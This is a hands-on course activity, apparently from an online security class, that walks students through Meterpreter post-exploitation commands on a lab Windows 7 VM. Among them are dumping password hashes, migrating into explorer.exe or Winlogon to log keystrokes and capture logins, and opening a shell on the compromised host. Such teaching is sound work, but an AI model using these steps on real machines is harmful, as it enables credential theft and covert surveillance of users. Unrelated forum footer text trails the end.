ACTIVITY: METERPRETER COMMANDS
This activity is ungraded.
Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.
System: During this activity, you’ll continue to use Metasploit as shown in the previous activity.
Software: In this activity you will use these applications and resources that are included in the Kali VM:
- Metasploit
- Meterpreter
Time: This activity should take you approximately 30 minutes to complete.
Goal
- To use Meterpreter to gain information and work in a target machine.
Instructions
Note: Hit Enter after each command.
Basic Commands
To start this activity, you should have used Metasploit to configure and deliver an exploit through a payload to a Windows 7 VM running on your machine.
In the Meterpreter command line, enter each of these commands and note the information you receive.
| Command | Information you will get… |
|---|---|
| sysinfo | General information about the compromised system |
| hashdump | Password hashes stored on the target machine. These hashes can be used in a brute force attack, a dictionary attack, or a rainbow table attack. |
| idletime | The amount of time since someone used the keyboard of the compromised system. |
| ps | A list of every running process on the compromised system. Notice the process id for the cmd.exe window. |
Enter kill followed by the process id for the cmd.exe window. The cmd window will close.
Enter ps. Record the PID of explorer.exe, which you will used in the next part of this activity.
Keystroke Recording
Meterpreter’s migrate command lets you move your running code into a process that has interactive access to the compromised system.
Here, you’ll migrate the running payload into the Explorer.exe process owned by the active user. That will let you use the keyscan_start and keyscan_dump commands to log the user's keystrokes.
- Enter migrate followed by the PID of Explorer.exe that you recorded earlier.
- Enter keyscan_start.
- Open up a text editor, and begin to type.
Be sure to use the arrow keys, the backspace key, and the delete key. - Open up a browser and go to www.edx.org.
- Login with a username of bob and a password of bobpassword.
NOTE: You will not be able to log in with any of these username/password combinations. They are provided to illustrate the key capture process. - Go to mycourses.rit.edu.
- Login with a username of bob and a password of bobpassword2.
- Go to gmail.com.
- Login with a username of bobiscool and a password of bobpassword3.
- Enter keyscan_dump. This will dump every keystroke since you initiated the keyscan_start command to the screen.
- Enter keyscan_stop.
To capture system login information migrate the running payload to the Winlogon process to capture the credentials of all users logging into the system if the machine is running. Rebooting or shutting down the compromised system ends the meterpreter session.
Shell Commands
Enter shell. This opens a Windows command line interface that affects the compromised machine.
Execute these networking commands from that interface:
- Enter ipconfig to see the machine’s network configuration.
- Enter arp –a to see the machine’s ARP cache.
- Enter ping 8.8.8.8 to send pings from the host machine to a Google Public DNS server.
With these commands, you can create a text file on the compromised machine:
- md bob creates a directory called bob.
- dir bob*.* verifies the previous step, showing the existence of the bob directory.
- cd bob changes current directory to the bob directory.
- echo “Ransomware!” > jonathan.txt writes a message to a dynamically created file)
- type jonathan.txt displays the contents of the file.
- del jonathan.txt deletes the file
- cd .. moves back up one directory.
- rd bob removes the directory
- dir bob*.* verifies the previous step, showing that there’s no bob directory anymore)
After you've finished, answer the Check Your Work questions.
You will continue to use meterpreter in the Windows 7 VM in the next activity. If you are not continuing now, use the instructions in the activity Using Metasploitto get started again.
97
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
